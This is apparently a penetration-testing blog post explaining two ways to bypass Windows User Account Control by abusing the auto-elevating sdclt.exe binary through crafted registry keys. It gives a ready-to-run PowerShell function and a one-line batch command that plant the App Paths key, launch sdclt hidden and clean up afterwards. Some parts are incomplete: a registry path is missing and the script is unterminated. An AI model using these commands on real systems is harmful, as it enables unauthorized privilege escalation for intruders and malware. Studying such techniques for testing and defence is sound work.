SDCLT is a Microsoft binary that is used in Windows systems (Windows 7 and above) to allow the user to perform backup and restore operations. However it is one of the Microsoft binaries that has been configured to have the autoElevate setting to “true”. This can be verified by using the Sigcheck tool from sysinternals and exploring its manifest file:

sdclt - autoelevate set to true
sdclt – autoelevate is set to true

Matt Nelson discovered two methods that can allow  a user to bypass UAC through this binary in Windows 10 environments. Both methods require to construct a specific registry structure however they differ from each other since one method can take command parameters while the other method the full path of a binary that will executed.

App Paths

The backup and restore operation is part of the control panel. This means that when the sdclt.exe process starts the control panel is starting as well. This binary it is designed to run as a high integrity process:

sdclt - Control Panel starts as High Integrity Process
sdclt – High Integrity Process

Also sdclt when it starts is looking for the following location in the registry.

HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe

However this location doesn’t exist therefore an attacker can create this registry location in order to execute a payload as a high integrity process bypassing the User Account Control.

sdclt - Registry Location Doesn't Exist
sdclt – Registry Location Doesn’t Exist
App Paths - UAC Bypass Registry
App Paths – UAC Bypass Registry

The next time that sdclt.exe will run an elevated command prompt will open:

sdclt - Elevated Command Prompt
sdclt – Elevated Command Prompt


There is another method which can be used to bypass User Account Control through sdclt which can take command parameters instead of a binary full path. Specifically when sdclt is executed with the “kickoffelev” is performing a check in the registry in order to find the following path:


By default this path doesn’t exist therefore it can be constructed manually to execute command prompt:

Fileless UAC - Isolated Command Registry
Sdclt Fileless UAC – Isolated Command Registry

When the sdclt will executed again with the /kickoffelev parameter it will find the IsolatedCommand registry key and an elevated command prompt will open.

sdclt Fileless - Elevated Command Prompt
sdclt Fileless – Elevated Command prompt


It is possible to automate this process with the use of the following PowerShell script that it was written for the purposes of pentestlab blog and it is a actually a simplistic version of Matt Nelson AppPathBypass script.

The code can be found below or through the GithubGist repository:

function SdcltUACBypass(){ 

Param (

  [String]$program = "C:\Windows\System32\cmd.exe" #default


#Create Registry Structure

New-Item "HKCU:\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" -Force

Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" -Name "(default)" -Value $program -Force

#Start sdclt.exe

Start-Process "C:\Windows\System32\sdclt.exe" -WindowStyle Hidden


Start-Sleep 3

Remove-Item "HKCU:\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" -Recurse -Force
Sdclt UAC Bypass - Powershell Script
sdclt UAC Bypass – PowerShell Script

Matt Nelson wrote also two PowerShell scripts for both methods to demonstrate this bypass.

App Paths - UAC Bypass via PowerShell
App Path – UAC Bypass via PowerShell
Fileless UAC Bypass - sdclt PowerShell
Fileless UAC Bypass – sdclt – PoweShell

Command prompt and notepad will run with the same level of privileges as sdclt which means their processes will run with integrity level set to High bypassing the user account control (UAC).

sdclt - cmd and notepad as High Integrity Processes
sdclt – cmd and notepad as High Integrity Processes


This bypass is also part of the UACME project method 31:

sdclt - UAC Bypass via UACMe
sdclt – UAC Bypass via UACME

Batch File

This bypass can be performed as well via a .bat file:

reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /d "cmd.exe" /f && START /W sdclt.exe && reg delete "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\App Paths\control.exe" /f


Bypassing UAC using App Paths

“Fileless” UAC Bypass using sdclt.exe


Leave a Reply

Fill in your details below or click an icon to log in: Logo

You are commenting using your account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s